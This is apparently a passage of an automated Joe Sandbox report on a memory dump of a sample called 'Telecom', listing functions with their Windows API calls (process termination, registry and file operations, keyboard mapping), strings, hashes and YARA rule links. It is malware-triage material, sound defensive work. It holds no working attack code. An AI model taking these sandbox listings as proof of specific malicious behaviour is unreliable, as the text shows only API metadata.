Instruction ID: e67c897b347545ea6669b61f303fd2776b5cea80840e73e739dcfc7e52c05f77
Opcode Fuzzy Hash: cf4a37621cf5c5c88b4779cb3dfc1a8473e0b36986e4fcc6743b0c7470ac7851
Instruction Fuzzy Hash: FBF0F93590050076C2122B36AD06ADF1765DFC0776B64C42FF91CE22D2EE6C8D02616D

Uniqueness

Uniqueness Score: -1.00%

Function 004D9480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00441F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00441F87
Part of subcall function 00441F2D: SelectObject.GDI32(?,00000000), ref: 00441F96
Part of subcall function 00441F2D: BeginPath.GDI32(?), ref: 00441FAD
Part of subcall function 00441F2D: SelectObject.GDI32(?,00000000), ref: 00441FD6

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 004D94AA
LineTo.GDI32(?,00000003,00000000), ref: 004D94BE
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 004D94CC
LineTo.GDI32(?,00000000,00000003), ref: 004D94DC
EndPath.GDI32(?), ref: 004D94EC
StrokePath.GDI32(?), ref: 004D94FC

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 70419b7a53075a4b7eb859581ea171ed7dc83c540bab1b4911565344bc065711
Instruction ID: b3be541bcfa109e92780f5cc8b92b1435230bcfe845731e95277f45ff317042d
Opcode Fuzzy Hash: 70419b7a53075a4b7eb859581ea171ed7dc83c540bab1b4911565344bc065711
Instruction Fuzzy Hash: 43111B7240114DBFEF029F94DC88EDA7F6DEB08364F00C022BA198A1A1C771AD55DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0044327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 004432AF
MapVirtualKeyW.USER32(00000010,00000000), ref: 004432B7
MapVirtualKeyW.USER32(000000A0,00000000), ref: 004432C2
MapVirtualKeyW.USER32(000000A1,00000000), ref: 004432CD
MapVirtualKeyW.USER32(00000011,00000000), ref: 004432D5
MapVirtualKeyW.USER32(00000012,00000000), ref: 004432DD

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: d25b3a50e8118d77ccde76da99c18b83bd04c6bbf6c3af1165a1b32fe8291cdb
Instruction ID: 01f05e8d6638db205e91ea3869077892134d7d58281d57cbc9f0cfc9060631c6
Opcode Fuzzy Hash: d25b3a50e8118d77ccde76da99c18b83bd04c6bbf6c3af1165a1b32fe8291cdb
Instruction Fuzzy Hash: A40167B0942B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 004AF437 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004AF447
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 004AF45D
GetWindowThreadProcessId.USER32(?,?), ref: 004AF46C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004AF47B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004AF485
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004AF48C

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 938039c475649ec79358249c6fa992b8ccb77a96ac97be195066932551dab1ab
Instruction ID: b0bc786de940044457439fa1a3dedf5fd921f47629ed9377e5472a08007466b7
Opcode Fuzzy Hash: 938039c475649ec79358249c6fa992b8ccb77a96ac97be195066932551dab1ab
Instruction Fuzzy Hash: 4BF05432642158BBE7215B529C0EEEF7F7CEFC7B11F00006AF601D1190D7A45A01C6B9

Uniqueness

Uniqueness Score: -1.00%

Function 004834D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 004834EF
SendMessageW.USER32(?,00001328,00000000,?), ref: 00483506
GetWindowDC.USER32(?), ref: 00483512
GetPixel.GDI32(00000000,?,?), ref: 00483521
ReleaseDC.USER32(?,00000000), ref: 00483533
GetSysColor.USER32(00000005), ref: 0048354D

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: f52d5065911cef5f74b2ec5a7533c080deedea07c8b795d0931f28286ac610e4
Instruction ID: c002c42aab04dd2bc5415dd19a8f6f70cf6fcee3916c597f07daaa9bf93737ec
Opcode Fuzzy Hash: f52d5065911cef5f74b2ec5a7533c080deedea07c8b795d0931f28286ac610e4
Instruction Fuzzy Hash: 15014B31901115FFDB506F64DC08BEE7BB5FB08721F500572F91AA21A0CB311E52AB55

Uniqueness

Uniqueness Score: -1.00%

Function 004A21C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 004A21CC
UnloadUserProfile.USERENV(?,?), ref: 004A21D8
CloseHandle.KERNEL32(?), ref: 004A21E1
CloseHandle.KERNEL32(?), ref: 004A21E9
GetProcessHeap.KERNEL32(00000000,?), ref: 004A21F2
HeapFree.KERNEL32(00000000), ref: 004A21F9

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 0fc9ed474b5b631eb5f406c93da539a313b82c055ccea84a833b523a813fe108
Instruction ID: f01e6b970cd6f4e1a01b8bb2e34b4d37b8dca42d5cdd3654646e786972ba87af
Opcode Fuzzy Hash: 0fc9ed474b5b631eb5f406c93da539a313b82c055ccea84a833b523a813fe108
Instruction Fuzzy Hash: 18E01A76405105FFDB012FA1EC0CD0ABF39FF49322B104232F22582070CB329420DB58

Uniqueness

Uniqueness Score: -1.00%

Function 004D4818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004D48D1
IsMenu.USER32(?), ref: 004D48E6
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004D492E
DrawMenuBar.USER32 ref: 004D4941

Strings

0, xrefs: 004D4825

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: 8a597df269797a4fac52e21e7323cc4611dfcd37c66e20a014577a274151f3ce
Instruction ID: 5ed67f1d6df81e6abc4edc483bd73f0070ee3d3e37d31c8f36706136826e3fd6
Opcode Fuzzy Hash: 8a597df269797a4fac52e21e7323cc4611dfcd37c66e20a014577a274151f3ce
Instruction Fuzzy Hash: F3417BB4A01209EFDB10CF62D8A4AAB7BB5FF45324F04416BF94597350C334AD54CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004A272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333

Part of subcall function 004A45FD: GetClassNameW.USER32(?,?,000000FF), ref: 004A4620

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 004A27B3
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 004A27C6
SendMessageW.USER32(?,00000189,?,00000000), ref: 004A27F6

Part of subcall function 00448577: _wcslen.LIBCMT ref: 0044858A

Strings

ListBox, xrefs: 004A2772
ComboBox, xrefs: 004A273D

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: d0a0ccfa156f6ad59aa5bc81aa993ce375686e7ba0221e9a39a40a3a8533c359
Instruction ID: e9f88fcc34f655ad4c491578a8354ddbcb50fff42bc760b03f9ac5748b3dcf37
Opcode Fuzzy Hash: d0a0ccfa156f6ad59aa5bc81aa993ce375686e7ba0221e9a39a40a3a8533c359
Instruction Fuzzy Hash: CD212675D00104BEDB04AB65D845CFFBB78DF56364F10422FF421A72E0CB7C490A9A68

Uniqueness

Uniqueness Score: -1.00%

Function 004650DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0046508E,?,?,0046502E,?,005098D8,0000000C,00465185,?,00000002), ref: 004650FD
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00465110
FreeLibrary.KERNEL32(00000000,?,?,?,0046508E,?,?,0046502E,?,005098D8,0000000C,00465185,?,00000002,00000000), ref: 00465133

Strings

CorExitProcess, xrefs: 00465108
mscoree.dll, xrefs: 004650F6

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 2d3f1fbe62774625d3db243346dab3df9adced1898eab1f98dd9a87cd9b49583
Instruction ID: 8af006d6ac8dfc47d2fb911e9109991bc4718f6235211398b3d96957094c160d
Opcode Fuzzy Hash: 2d3f1fbe62774625d3db243346dab3df9adced1898eab1f98dd9a87cd9b49583
Instruction Fuzzy Hash: B7F0C834D41208BBDB115F95DC09BDEBFB4EF05712F000066F805A2260DB385D80DA99

Uniqueness

Uniqueness Score: -1.00%

Function 0044663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,0044668B,?,?,004462FA,?,00000001,?,?,00000000), ref: 0044664A
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0044665C
FreeLibrary.KERNEL32(00000000,?,?,0044668B,?,?,004462FA,?,00000001,?,?,00000000), ref: 0044666E

Strings

Wow64DisableWow64FsRedirection, xrefs: 00446656
kernel32.dll, xrefs: 00446642

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 782bb2d50b0ce1e54b93c4b04cf21f66694d27ae7afdf6ad4c3cb34bb843893b
Instruction ID: f65af6163673cca1b881ed09edbb7c853577afbab6203663a2bea5604f3e4f43
Opcode Fuzzy Hash: 782bb2d50b0ce1e54b93c4b04cf21f66694d27ae7afdf6ad4c3cb34bb843893b
Instruction Fuzzy Hash: 5AE0E635A0262257A2211725AC08B5F6668DF93F16B070227FD04E2358DB58CD0185AD

Uniqueness

Uniqueness Score: -1.00%

Function 00446607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00485657,?,?,004462FA,?,00000001,?,?,00000000), ref: 00446610
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00446622
FreeLibrary.KERNEL32(00000000,?,?,00485657,?,?,004462FA,?,00000001,?,?,00000000), ref: 00446635

Strings

Wow64RevertWow64FsRedirection, xrefs: 0044661C
kernel32.dll, xrefs: 00446609

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: c137cf81aa46628b8016218ea0669855af20fc438360dbaa05857da416542c9b
Instruction ID: 604165453bd1b44da74cf6f42da3b3d1eae7d8de4db1afceb43c0dd1864e2fa0
Opcode Fuzzy Hash: c137cf81aa46628b8016218ea0669855af20fc438360dbaa05857da416542c9b
Instruction Fuzzy Hash: 60D01235A1353257523227296C18A8F6B18DE93F113070127B900A2258CF68CD42859D

Uniqueness

Uniqueness Score: -1.00%

Function 004B3306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004B35C4
DeleteFileW.KERNEL32(?), ref: 004B3646
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 004B365C
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004B366D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004B367F

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 285c931a5e8b72466577608b1cb7794d0b90d4db0555ccbd2211e559341a0e2c
Instruction ID: ceac35c35ccefd5f0cc5e92ec3077c894b59a85e70a56fedc9305e5d2a3eda81
Opcode Fuzzy Hash: 285c931a5e8b72466577608b1cb7794d0b90d4db0555ccbd2211e559341a0e2c
Instruction Fuzzy Hash: 93B16071D01119ABDF11EFA6CC85EDFBBBCEF49314F0040ABF509A6141EA389B458B65

Uniqueness

Uniqueness Score: -1.00%

Function 004CADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 004CAE87
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 004CAE95
GetProcessIoCounters.KERNEL32(00000000,?), ref: 004CAEC8
CloseHandle.KERNEL32(?), ref: 004CB09D

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: ad51c9fe504937789b7a0c2814b633f373b167f379bc643dbce2a3d715cfe548
Instruction ID: 9ae740e2ec67df352d52bb02ac75342ff429ce4b6b1a1092bb82cd87a8f7cd42
Opcode Fuzzy Hash: ad51c9fe504937789b7a0c2814b633f373b167f379bc643dbce2a3d715cfe548
Instruction Fuzzy Hash: 9BA1B075A00300AFE760DF26C886F2AB7E4AF44714F54881EF9598B392CB75EC41CB86

Uniqueness

Uniqueness Score: -1.00%

Function 004CC429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333

Part of subcall function 004CD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004CC10E,?,?), ref: 004CD415
Part of subcall function 004CD3F8: _wcslen.LIBCMT ref: 004CD451
Part of subcall function 004CD3F8: _wcslen.LIBCMT ref: 004CD4C8
Part of subcall function 004CD3F8: _wcslen.LIBCMT ref: 004CD4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004CC505
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004CC560
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 004CC5C3
RegCloseKey.ADVAPI32(?,?), ref: 004CC606
RegCloseKey.ADVAPI32(00000000), ref: 004CC613

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 4b009e9d3640011459a8e86b6e05ee8cccb8148894274ab02c72ced9c2f3b48b
Instruction ID: 5e15694d06c97c81d0a0801932913d34d0f316bee43e10b3330b048954a835e7
Opcode Fuzzy Hash: 4b009e9d3640011459a8e86b6e05ee8cccb8148894274ab02c72ced9c2f3b48b
Instruction Fuzzy Hash: 04619D75208241AFD354DF14C890F2ABBE5FF84308F1485AEF4998B292CB35ED46CB96

Uniqueness

Uniqueness Score: -1.00%

Function 004AED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 004AE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004AD7CD,?), ref: 004AE714

Part of subcall function 004AE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,004AD7CD,?), ref: 004AE72D

Part of subcall function 004AEAB0: GetFileAttributesW.KERNEL32(?,004AD840), ref: 004AEAB1

lstrcmpiW.KERNEL32(?,?), ref: 004AED8A
MoveFileW.KERNEL32(?,?), ref: 004AEDC3
_wcslen.LIBCMT ref: 004AEF02
_wcslen.LIBCMT ref: 004AEF1A
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 004AEF67

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: f79d188e4940b2ef505e7b7a27c6382dbd3160e731c5669ed0d730988b85e564
Instruction ID: d6195c021bf810813116bf99440fac9cba4abd65fc12a3de07e13b5eda67670f
Opcode Fuzzy Hash: f79d188e4940b2ef505e7b7a27c6382dbd3160e731c5669ed0d730988b85e564
Instruction Fuzzy Hash: 9F5170B24083859BC724EB92D8819DBB3ECEF95304F00092FF599C3151EF79E688875A

Uniqueness

Uniqueness Score: -1.00%

Function 004A9517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 004A9534
VariantClear.OLEAUT32 ref: 004A95A5
VariantClear.OLEAUT32 ref: 004A9604
VariantClear.OLEAUT32(?), ref: 004A9677
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 004A96A2

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 9e3ea44d7ee47ee349874722153f620d1fd6eacd04ac808b0902301663e6f7f3
Instruction ID: 63221f52f17fac75f2d8093c8d5427c72e2cc61f0f452095b6c63908ce0db994
Opcode Fuzzy Hash: 9e3ea44d7ee47ee349874722153f620d1fd6eacd04ac808b0902301663e6f7f3
Instruction Fuzzy Hash: 31513AB5A00619EFCB14CF58C884EAAB7F8FF99314B15856AE905DB310E734E911CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004B9540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 004B95F3
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 004B961F
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 004B9677
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 004B969C
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 004B96A4

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

